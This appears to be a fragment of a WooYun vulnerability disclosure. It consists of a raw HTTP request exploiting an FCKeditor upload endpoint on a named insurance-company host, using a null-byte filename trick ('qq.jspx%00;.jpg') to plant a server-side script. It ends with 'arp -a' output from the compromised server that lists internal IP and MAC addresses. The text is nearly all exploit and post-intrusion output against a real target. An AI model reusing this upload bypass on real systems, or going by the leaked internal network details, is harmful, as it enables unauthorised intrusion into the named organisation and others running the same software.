WooYun.org

POST http://webchat.cpic.com.cn:9090/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File HTTP/1.1
Host: webchat.cpic.com.cn:9090
Connection: keep-alive
Content-Length: 194
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webchat.cpic.com.cn:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1E5aBWJ6kwQ1ig1k
Referer: http://webchat.cpic.com.cn:9090/FCKeditor/editor/dialog/fck_image.html?ImageButton
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 
------WebKitFormBoundary1E5aBWJ6kwQ1ig1k
Content-Disposition: form-data; name="NewFile"; filename="qq.jspx%00;.jpg"
Content-Type: image/jpeg
test
------WebKitFormBoundary1E5aBWJ6kwQ1ig1k--

[/cpic/jtwebchat/ucstarserver/web/]$ arp -a
? (10.190.178.229) at 00:50:56:B9:70:40 [ether] on eth0
? (10.190.178.228) at 00:50:56:B9:70:3F [ether] on eth0
? (10.190.178.64) at 00:50:56:B9:02:D1 [ether] on eth0
? (10.190.178.97) at 00:50:56:B9:57:17 [ether] on eth0
? (10.190.178.254) at 00:00:5E:00:01:04 [ether] on eth0